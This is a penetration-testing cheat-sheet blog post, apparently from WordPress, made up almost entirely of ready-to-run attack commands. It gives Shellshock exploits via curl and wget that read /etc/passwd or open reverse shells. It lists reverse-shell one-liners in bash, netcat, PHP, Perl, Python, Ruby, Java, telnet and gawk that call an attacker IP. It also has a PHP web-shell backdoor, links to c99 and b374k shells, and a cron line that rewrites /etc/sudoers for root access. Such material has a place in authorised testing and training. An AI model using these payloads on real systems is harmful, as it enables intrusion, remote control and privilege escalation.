Pentest Killer Commands

Cheat Sheets

Vulnerability assesment

Scanning a webapplication with nikto with proxy configuration.

nikto -host 192.168.xx.xx -userproxy http://192.168.xx.xx:3129

 

Directory Buster with Proxy

Dirb http://192.168.XX.XX -p 192.168.XX.XX:3129

WPScan With Proxy

wpscan --url 192.168.XX.XX/dir -proxy 192.168.XX.XX:3128

Curl Commands

Browsing the web page with proxy:

  1. curl 192.168.XX.XX/robots.txt -x 192.168.XX.XX:3128
  2. curl --proxy 192.168.37.129:3128 http://192.168.37.129:80/robots.txt

 

Browse with verbose move:

 curl -v 192.168.37.129 --proxy 192.168.37.129:3128

 

Shell shock exploitation with curl:

curl -H "User-Agent: () { :; }; echo; $CMD" --proxy http://192.168.37.129:3128 http://192.168.37.129/cgi-bin/status

 

Example:

curl -H "User-Agent: () { :; }; echo; /bin/uname -a" --proxy http://192.168.37.129:3128 http://192.168.37.129/cgi-bin/status
curl -x http://192.168.37.129:3128 -A "() { :; };/bin/sh -i >& /dev/tcp/192.168.32.41/443 0>&1" http://192.168.37.129/cgi-bin/status

 

Reverse Shell with Curl

curl 'http://192.168.XX.XX/cgi-bin/index.cgi' --user-agent ';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc XXX.XXX.XXX.XXX 80 >/tmp/f;exit' --data 'dest=%0ash</proc/self/environ'

Shellshock exploitation with wget

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"
wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/192.168.79.173/4444 0<&1" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"

Spawn Shell

Spawn Python TTY Shell :

python -c 'import pty; pty.spawn("/bin/bash")'

 

Spawn Interactive sh shell :

/bin/sh -i

 

Spawn Perl TTY Shell :

exec "/bin/sh"; 

perl e 'exec "/bin/sh";'

 

Spawn Ruby TTY Shell :

exec "/bin/sh"

 

Spawn Shell with vi editor :

:!bash

 

Spawn TTY shell Nmap

!sh

 

Reverse Shells

Kali Webshell directory:

root@kali:/usr/share/webshells# ls -ltr
total 0
drwxr-xr-x 2 root root 183 Jan 20 2016 php
drwxr-xr-x 2 root root 63 Jan 20 2016 perl
drwxr-xr-x 2 root root 33 Jan 20 2016 cfm
drwxr-xr-x 2 root root 34 Jan 20 2016 aspx
drwxr-xr-x 2 root root 56 Jan 20 2016 asp
drwxr-xr-x 1 root root 40 Feb 8 09:44 jsp
root@kali:/usr/share/webshells#

 

Bash:

  1. bash -i > /dev/tcp/ATTSCKERS_IP/port 0>&1
  2. exec /bin/bash 0&0 2>&0
  3. 0<&196;exec 196<>/dev/tcp/ATTACKERS_IP/80; sh <&196 >&196 2>&196
  4. exec 5<>/dev/tcp/ATTACKERS_IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
  5. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.156.130 445 >/tmp/f

 

Example:

bash -c "bash -i >& /dev/tcp/192.168.171.2/31337 0>&1"
http://192.168.XX.XX:8080/?page=1&rcmd=bash -c "bash -i >& /dev/tcp/ATTACKERS_IP/31337 0>&1"

 

PHP:

php -r '$sock=fsockopen("ATTACKERS_IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
Note: TCP uses file descriptor 3. Replace 3 with 4, 5, or 6 if it doesn’t work

 

Netcat:

  1. nc -e /bin/sh ATTACKERS_IP Port
  2. /bin/sh | nc ATTACKERS_IP Port
  3. rm -f /tmp/p; mknod /tmp/p p && nc ATTACKERS_IP 4444 0/tmp/p

 

Example:

nc -e /bin/sh 192.168.37.122 4444

 

Telnet:

  1. rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
  2. telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

 

Example:

telnet 192.168.37.130 80 | /bin/bash | telnet 192.168.37.130 443

 

Perl:

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Example:

perl -e 'use Socket;$i="192.168.1.XX";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Perl Windows:

  1. perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
  2. perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Ruby:

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

 

Java:

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

 

Example:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.50",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

Python Reverse Shell URL encode format:

python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22192.168.110.50%22%2C443))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27

 

Example:

http://192.168.XX.XX:port/?page=mailer&mail=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.1.14",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

Gawk:

#!/usr/bin/gawk -f BEGIN { Port = 8080 Prompt = "bkd> " Service = "/inet/tcp/" Port "/0/0" while (1) { do { printf Prompt |& Service Service |& getline cmd if (cmd) { while ((cmd |& getline) > 0) print $0 |& Service close(cmd) } } while (cmd != "exit") close(Service) } }

 

Reverse Shell with Curl

curl 'http://192.168.XX.XX/cgi-bin/index.cgi' --user-agent ';rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc XXX.XXX.XXX.XXX 80 >/tmp/f;exit' --data 'dest=%0ash</proc/self/environ'

 

Building a exploit

Cross compile 32 bit binary on 64 bit Linux:

gcc -m32 exploit.c -o exploit

 

Cross compile 32 windows .exe on Linux:

i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

 

Shell Shock

() { ignored;};/bin/bash -i >& /dev/tcp/192.168.221.139/443 0>&1

 

Backdoors

PHP:

<?php system($_REQUEST[cmd]); ?>

Shells

DAws.php:

https://github.com/dotcppfile/DAws/blob/master/DAws.php

 

c99:

https://github.com/tennc/webshell/blob/master/php/PHPshell/c99shell/c99shell.php

 

b374k shell 3.2

https://github.com/b374k/b374k

 

Privilege escalation 

Cron job update

echo 'chmod 777 /etc/sudoers && echo "<user name (LOW priv)> ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /dir/<cronfile to run>

 

Reference Sites for enumeration 

http://www.speedguide.net/port.php?port=8080
https://www.youtube.com/user/myexploit2600
https://myexploit.wordpress.com/port-number-exploits/
https://docs.google.com/uc?export=download&confirm=wKvF&id=0Bx3odaY_Hs9oaGZuTGJnMG9lUUU
https://myexploit.wordpress.com/control-metasploit-post-exploits/
http://www.bekkoame.ne.jp/~s_ita/port/port1-99.html
http://www.speedguide.net/ports_sg.php
https://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/

http://www.vulnerabilityassessment.co.uk/nfs.htm

https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/

https://www.pentestpartners.com/blog/using-nfsshell-to-compromise-older-environments/

 

Reference Links for LFI:

https://highon.coffee/blog/lfi-cheat-sheet/

 

IP Tables Rules:

https://www.suse.com/communities/blog/basic-iptables-tutorial/

 

 

Reference Links:

 

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s